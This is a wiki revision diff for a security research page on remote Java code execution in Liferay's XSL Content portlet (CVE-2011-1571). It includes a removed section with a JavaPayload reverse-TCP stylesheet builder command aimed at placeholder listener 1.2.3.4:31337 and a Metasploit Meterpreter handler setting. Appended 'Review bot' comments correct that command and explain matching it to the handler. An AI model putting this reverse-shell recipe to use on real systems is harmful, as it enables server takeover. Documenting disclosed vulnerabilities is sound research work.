Changes for page Application_Liferay

Last modified by Nicolas Gregoire on 2012/04/19 14:05

From version 24.1
edited by Nicolas Gregoire
on 2012/04/19 14:05
Change comment: There is no comment for this version
To version 22.1
edited by Nicolas Gregoire
on 2012/01/14 18:49
Change comment: There is no comment for this version

Details

Page properties
Tags
... ... @@ -1,1 +1,1 @@
1 -liferay|java|xalan-j|code execution|XEE
1 +liferay|java|xalan-j|code execution|xee
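Review bot: style point: because this comparison runs from version 24.1 down to 22.1, the `-` line is the newer revision, and there `XEE` is the only capitalised tag among five lowercase ones (`liferay|java|xalan-j|code execution`); keep the lowercase `xee` unless the acronym is deliberately meant to stand out, so that tag searches written in either case stay consistent with the rest of the site.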
Content
... ... @@ -8,21 +8,12 @@
8 8  
9 9  = Java code execution =
10 10  
11 -LIferay includes numerous portlets. The "XSL Content" portlet displays the result of the XSL transformation of a XML document. The XSLT engine used by default is [[Xalan-J>>Engine_XalanJ]] (but this can probably modified easily using [[JAXP>>http://en.wikipedia.org/wiki/Java_API_for_XML_Processing||rel="__blank"]]). As Xalan-J allows by default to execute Java code from the stylesheet, that's an easy to exploit vulnerability. Any logged-in user can execute arbitrary Java code in the context of the Web Application server (usually Tomcat) : [[CVE-2011-1571>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1571||rel="__blank"]].
11 +LIferay includes numerous portlets. The "XSL Content" portlet displays the result of the XSL transformation of a XML document. The XSLT engine used by default is [[Xalan-J>>Engine_Saxon]] (but this can probably modified easily using [[JAXP>>http://en.wikipedia.org/wiki/Java_API_for_XML_Processing||rel="__blank"]]). As Xalan-J allows by default to execute Java code from the stylesheet, that's an easy to exploit vulnerability. Any logged-in user can execute arbitrary Java code in the context of the Web Application server (usually Tomcat) : [[CVE-2011-1571>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1571||rel="__blank"]].
12 12  
13 13  Executing commands and reading the output (using the "xalanj-reading-stdout.xsl" script included on the [[Xalan-J>>Engine_XalanJ]] page) :
14 14  
15 15  [[image:liferay-execute-commands-with-stdout.png||style="display: block; margin-left: auto; margin-right: auto"]]
16 16  
17 -= Meterpreter shell =
18 -
19 -As described in [[Feature #6594: Liferay XSL Command Execution>>http://dev.metasploit.com/redmine/issues/6594||rel="__blank"]], here's a way to gain a Meterpreter shell with this vulnerability :
20 -
21 -- stand-alone JavaPayload to generate the XSLT stylesheet (java jar JavaPayload.jar Builder Template XalanJ.xsl output.xsl ReverseTCP 1.2.3.4 31337 -- JSh)
22 -- Metasploit to handle the Meterpreter connection (PAYLOAD=java/meterpreter/reverse_tcp)
23 -- Manual interaction to trigger the vulnerability (browser)
24 -
25 -
26 26  = Additional vulnerabilities =
27 27  
28 28  Two others vulnerabilities were identified in the "XSL Content" portlet :
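Review bot: the `+` side of line 11 links the label "Xalan-J" to `Engine_Saxon`, while line 13 of the same hunk links the same label to `Engine_XalanJ`, and the surrounding sentence names Xalan-J as the default engine; since this comparison runs from 24.1 down to 22.1, the `+` side is the older revision and the `-` side's `[[Xalan-J>>Engine_XalanJ]]` is the correction, so the newer target is the one to keep. Two defects survive in both versions of line 11 and should be fixed alongside it: "LIferay" (capital I) and "this can probably modified" (missing "be"). In the removed Meterpreter section, the builder invocation `java jar JavaPayload.jar Builder Template XalanJ.xsl output.xsl ReverseTCP 1.2.3.4 31337 -- JSh` is missing the hyphen in `-jar`; as written the JVM would try to load a class named `jar` rather than run the archive. `1.2.3.4` and `31337` read as a placeholder listener address and port for the `ReverseTCP` stager; if the section is restored, say so and point out that they must match the Metasploit handler configured with `PAYLOAD=java/meterpreter/reverse_tcp`.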